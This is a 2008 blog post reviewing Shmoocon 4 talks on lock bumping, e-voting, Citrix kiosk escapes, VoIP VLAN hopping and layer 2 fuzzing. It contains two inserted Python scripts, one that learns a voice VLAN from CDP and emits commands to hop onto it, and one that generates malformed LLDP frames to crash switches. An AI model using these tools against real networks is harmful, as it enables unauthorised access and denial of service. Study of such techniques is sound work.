Wednesday, February 20, 2008

Shmoocon 4 in review

For those that have not attended or are not familiar with shmoocon, it's an annual hacker con. The event is held in Washington DC and additional event info can be found on their site at

Tickets are released on a timed basis and come in three classes... the early bird ticket for $75, the normal ticket for $150, and the I pissed around and didn't get a less expensive ticket for $300. When I say "timed basis", they have specific dates and times that they will make a certain number of each ticket class available. Needless to say, on the ticket release dates the shmoo ticketing server was quite loaded but luckily I was able to obtain one of the early bird special tickets.

Day One:

The con kicked off on Friday, Feb 15 with a single track of talks. I missed the first few talks (schedule here) and caught a little more than the last half. Unfortunately I don't really recall the first talks, so they must not have been altogether that interesting for me. I primarily paid attention to the last three talks:
  • Hacking the Samurai Spirit - Isaac Mathis
  • New Countermeasures to the Bump Key Attack - Deviant Ollam
  • Keynote Address - J. Alex Halderman
Hacking the Samurai Spirit:

The premise of this talk was to discuss the current cultural differences, history and mindset of the Japanese as related to Information Security. While this talk was humorous, I did not find it terribly technically relevant. The speaker seemed to be giving more of a history of security related events over the past 60 years in Japan, though there were some good and interesting points at the end that did relate to Information Security. Specifically, the speaker detailed several scams that target the uneducated internet user in Japan. A simple example of this type of scam would be a pr0n site that requires the user to click on an "I Agree, Enter" type link prior to gaining access to the goods. Once this action has been completed, the user is then told that they have just agreed to pay X amount of money to access the site and that if they do not pay said money they will be sued. The people in Japan are afraid of reprisal of any type and typically will pay this immediately. So overall I would rate this talk somewhere in the middle due to its humorous nature.

New Countermeasures to the Bump Key Attack

Having just sat through the history lesson re: Japan, I was certainly ready for something different and more exciting. New Countermeasures to the Bump Key Attack certainly delivered this for me. I (as many in the security community) have been aware for years of the gross weaknesses that exist in the physical lock world, thanks to the consistent pounding and education of the world by people such as Deviant Ollam. This talk covered the basics of lock-picking using bump keys and modified bump keys, then detailed how many lock manufacturers are dealing with this issue. The media for the presentation itself was well done and clear; further, the presenter did a great job at getting the point across.

A challenge was also issued during this talk, titled "Gringo Warrior". The setting for Gringo Warrior is simple: you are a Gringo that got a little blitzed in Tijuana and woke up in a Mexican jail cell with no recollection of the night before. In walks the corrupt policia and tells you that you have to pay a fine, the cost of that fine being whatever money you have in your bank account. He tells you that he will leave you for an hour to consider this. Luckily, while they were emptying your pockets they missed your lock-picking tools. Your challenge is to pick the handcuffs that you are in, pick the cell door, disable the cell guard and pick a locked cabinet that has your passport in it. At this point, you have a choice: you must either pick the front door lock to leave, or you can pick an additional locked door in the cabinet to obtain a handgun and shoot out a surveillance camera to sneak out a window. This was a timed event; the event winner took under a minute and a half to complete the entire course and received a social engineering kit (hardhat and several vendor specific polos)!

Keynote Address - J. Alex Halderman

This talk concerned the new electronic voting systems and their MANY security flaws. It was both interesting and somewhat technical, but more about detailing the process that they took to obtain their first voting machine to test (somewhat clandestine in nature and humorous). The short of it is, as we all now know, that these devices have historically been easily compromised both electronically and physically. One key point of humor is that Diebold (the primary manufacturer) had a high resolution picture of the actual keys used to access the I/O ports of the system on their website; from this picture they were able to successfully create a working keyset.

Day Two and Three:

I am bundling these days together and only writing about the talks that I found interesting for the remainder of this posting.
  • VoIP Penetration Testing: Lessons Learned -John Kindervag and Jason Ostrom
  • Got Citrix? Hack It! - Shanit Gupta
  • Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to "SPIKE Land" - Enno Rey and Daniel Mende
VoIP Penetration Testing

This talk primarily dealt with using the voiphopper tool to jump onto voice VLANs and conduct your activities as needed there. The fun part would be to jump onto the voice VLAN and do a little fuzzing using SPIKE or the like ;-). Overall a fairly interesting talk, and there were demonstrations that made it a bit more exciting.
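The core of the voice VLAN hop is that the switch tells the phone which VLAN to tag its traffic with, and anything plugged into that port can listen for the same advertisement. The following is an added example, not voiphopper's own code or anything shown in the talk: it builds a constructed CDP frame of the kind a Catalyst sends to a phone port (device ID, port ID and the "VoIP VLAN Reply" TLV), parses the voice VLAN out of it, and produces the Linux iproute2 commands to bring up a tagged sub-interface on that VLAN. The switch name, port, MAC addresses and VLAN number are made up for the demo.

```python
"""Learn the voice VLAN from a CDP advertisement and emit the commands to
hop onto it.  Added example: the frame is hand-built to mirror a real CDP
advertisement; nothing here is voiphopper code."""
import struct

CDP_MCAST = bytes.fromhex("01000ccccccc")              # CDP multicast destination
SNAP_CDP = bytes.fromhex("aaaa03" "00000c" "2000")     # LLC/SNAP, Cisco OUI, CDP PID 0x2000

TLV_DEVICE_ID = 0x0001
TLV_PORT_ID = 0x0003
TLV_VOIP_VLAN_REPLY = 0x000E   # carries the voice VLAN the phone should tag with


def cdp_tlv(tlv_type: int, value: bytes) -> bytes:
    # CDP TLV: 16-bit type, 16-bit length that includes the 4-byte header
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def build_cdp_frame(device_id: str, port_id: str, voice_vlan: int) -> bytes:
    """Constructed CDP frame (assumed values) like one sent to a phone port."""
    body = (cdp_tlv(TLV_DEVICE_ID, device_id.encode())
            + cdp_tlv(TLV_PORT_ID, port_id.encode())
            # VoIP VLAN Reply data: one "data" byte (0x01) then the 16-bit VLAN ID
            + cdp_tlv(TLV_VOIP_VLAN_REPLY, b"\x01" + struct.pack("!H", voice_vlan)))
    cdp_hdr = struct.pack("!BBH", 2, 180, 0)   # version 2, TTL 180 s, checksum left 0 here
    llc_len = len(SNAP_CDP) + len(cdp_hdr) + len(body)
    src_mac = bytes.fromhex("00112233aabb")     # made-up switch MAC
    return CDP_MCAST + src_mac + struct.pack("!H", llc_len) + SNAP_CDP + cdp_hdr + body


def parse_cdp(frame: bytes) -> dict:
    """Return the device ID, port ID and voice VLAN found in a CDP frame."""
    if frame[:6] != CDP_MCAST or frame[14:22] != SNAP_CDP:
        raise ValueError("not a CDP frame")
    off = 22 + 4   # skip CDP version / TTL / checksum
    info = {}
    while off + 4 <= len(frame):
        t, l = struct.unpack("!HH", frame[off:off + 4])
        if l < 4 or off + l > len(frame):
            # bogus length: stop rather than read past the buffer
            raise ValueError("malformed CDP TLV")
        val = frame[off + 4:off + l]
        if t == TLV_DEVICE_ID:
            info["device_id"] = val.decode(errors="replace")
        elif t == TLV_PORT_ID:
            info["port_id"] = val.decode(errors="replace")
        elif t == TLV_VOIP_VLAN_REPLY and len(val) >= 3:
            info["voice_vlan"] = struct.unpack("!H", val[1:3])[0]
        off += l
    return info


def hop_commands(parent_if: str, vlan: int) -> list:
    """Linux iproute2 commands for a tagged sub-interface on the voice VLAN."""
    sub = f"{parent_if}.{vlan}"
    return [f"ip link add link {parent_if} name {sub} type vlan id {vlan}",
            f"ip link set {sub} up",
            f"dhclient {sub}"]


if __name__ == "__main__":
    frame = build_cdp_frame("sw-floor3.example", "GigabitEthernet1/0/12", 200)
    info = parse_cdp(frame)
    print(info)
    print("\n".join(hop_commands("eth0", info["voice_vlan"])))
```

On a real network the frame comes from a raw socket bound to the access port instead of build_cdp_frame(); the parse and the sub-interface commands are the same. The length check in parse_cdp() is the kind of thing the fuzzing talk below is about: a switch or phone stack that trusts the TLV length field is exactly what falls over.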

Got Citrix? Hack It!

I found this talk to be fairly basic, but that said, quite technically relevant. I think that we often do not consider the most simple way to get into something, and that is why this was a good talk. The premise of this was hacking Citrix, and it primarily focused on using the Kiosk mode. The speaker pointed out that while the kiosk often has a limited set of initial applications available to be run, or forced to run, the hotkeys are still often active. Examples include Ctrl+N to open a new Internet Explorer browser instance that now has the address bar in it; you can therefore browse wherever you want and grab a payload to further break into your mom's kiosk. Other examples are Ctrl+H (history), Ctrl+F1 (the Citrix shortcut for Ctrl+Alt+Del) and so on.

Advanced Protocol Fuzzing

Probably the best talk of the con in my opinion, this talk focused on the steps that some German researchers took to fuzz several layer 2 protocols. They worked through creating the protocol definitions in SPIKE and Sulley and their various reverse engineering processes from various sources including Wireshark. This talk also included a live demo of crashing a medium sized Cisco Catalyst using LLDP fuzzing techniques.
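To make the "protocol definition" part concrete, here is an added example in plain Python that is not the researchers' SPIKE or Sulley definitions and has nothing to do with the specific crash they demonstrated: it models a minimal LLDPDU (Chassis ID, Port ID, TTL, End TLVs) and then generates the classic layer 2 mutation cases a fuzzer would drive at a switch: TLV length fields that over- or under-claim, a maximum-length string, a missing End TLV, and every unknown TLV type. Source MAC and port name are made up; send_frame() is a Linux raw socket sender that needs root and is not called by the demo.

```python
"""Build LLDP frames and fuzz cases the way a SPIKE/Sulley protocol
definition would, in plain Python.  Added example, not the talk's code."""
import socket
import struct
from typing import Iterator, Optional, Tuple

LLDP_MCAST = bytes.fromhex("0180c200000e")   # nearest-bridge LLDP multicast
ETHERTYPE_LLDP = 0x88CC
TLV_END, TLV_CHASSIS_ID, TLV_PORT_ID, TLV_TTL = 0, 1, 2, 3
SUBTYPE_MAC, SUBTYPE_IFNAME = 4, 5
SRC_MAC = bytes.fromhex("020000000001")       # made-up locally administered MAC


def lldp_tlv(tlv_type: int, value: bytes, length: Optional[int] = None) -> bytes:
    """TLV header is 16 bits: 7-bit type, 9-bit length.  `length` lets a
    mutation lie about the payload size, which is the whole point of fuzzing it."""
    if length is None:
        length = len(value)
    return struct.pack("!H", ((tlv_type & 0x7F) << 9) | (length & 0x1FF)) + value


def decode_tlv_header(hdr: bytes) -> Tuple[int, int]:
    v = struct.unpack("!H", hdr[:2])[0]
    return v >> 9, v & 0x1FF


def build_lldpdu(chassis_mac: bytes, port_name: bytes, ttl: int,
                 ttl_len: Optional[int] = None, port_len: Optional[int] = None,
                 end: bool = True) -> bytes:
    """The mandatory TLVs in order; the optional args are mutation hooks."""
    pdu = (lldp_tlv(TLV_CHASSIS_ID, bytes([SUBTYPE_MAC]) + chassis_mac)
           + lldp_tlv(TLV_PORT_ID, bytes([SUBTYPE_IFNAME]) + port_name, port_len)
           + lldp_tlv(TLV_TTL, struct.pack("!H", ttl), ttl_len))
    if end:
        pdu += lldp_tlv(TLV_END, b"")
    return pdu


def frame(pdu: bytes, src_mac: bytes = SRC_MAC) -> bytes:
    return LLDP_MCAST + src_mac + struct.pack("!H", ETHERTYPE_LLDP) + pdu


def fuzz_cases() -> Iterator[Tuple[str, bytes]]:
    """Yield (name, frame) pairs.  Each case breaks one assumption a
    receiving LLDP parser might make."""
    mac = SRC_MAC
    yield "baseline", frame(build_lldpdu(mac, b"eth0", 120))
    # length field larger than the payload: the parser reads past the TLV
    yield "ttl_len_overclaim", frame(build_lldpdu(mac, b"eth0", 120, ttl_len=0x1FF))
    # length field smaller than the payload: trailing bytes become the "next" TLV
    yield "port_len_underclaim", frame(build_lldpdu(mac, b"eth0", 120, port_len=1))
    # largest string that fits the 9-bit length (1 subtype byte + 510 chars)
    yield "port_name_max", frame(build_lldpdu(mac, b"A" * 510, 120))
    # missing End-of-LLDPDU TLV
    yield "no_end_tlv", frame(build_lldpdu(mac, b"eth0", 120, end=False))
    # every reserved/unknown type, with a length claim that exceeds the data
    for t in range(9, 127):
        body = (build_lldpdu(mac, b"eth0", 120, end=False)
                + lldp_tlv(t, b"\x00" * 8, 0x1FF) + lldp_tlv(TLV_END, b""))
        yield f"unknown_type_{t}", frame(body)


def send_frame(iface: str, data: bytes) -> int:
    """Linux only, needs CAP_NET_RAW.  Not invoked by the demo below."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(data)


if __name__ == "__main__":
    for name, f in fuzz_cases():
        print(f"{name:24s} {len(f):4d} bytes  {f[14:].hex()[:40]}...")
```

Driving these at a switch means calling send_frame() per case while watching the target (console, ping, or LLDP neighbor table) so you know which case it was that stopped responding; that pacing-and-monitoring loop is what Sulley adds over a generator like this.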

All the other talks...

I am sure that there were several other good talks; unfortunately, with three tracks scheduled at the same time, I was not able to see everything. Shmoocon does post videos of the talks on their site, so keep an eye out. Unfortunately I did attend several talks that were presented by fairly well known people, and I believe that this was the only reason that these talks were approved, as they contained really no new or relevant information.

Overall I would rate Shmoocon as a good time with decent material and good speakers. I mean, for $75 I can't complain; I certainly feel like I got my money's worth. Perhaps next year or at an upcoming con I will present on HeX with the team, so keep an eye out!


1 comment:

Viola said...

Such a nice blog for those who are concerned about security both residentially and commercially. As I have got from Security Window Gates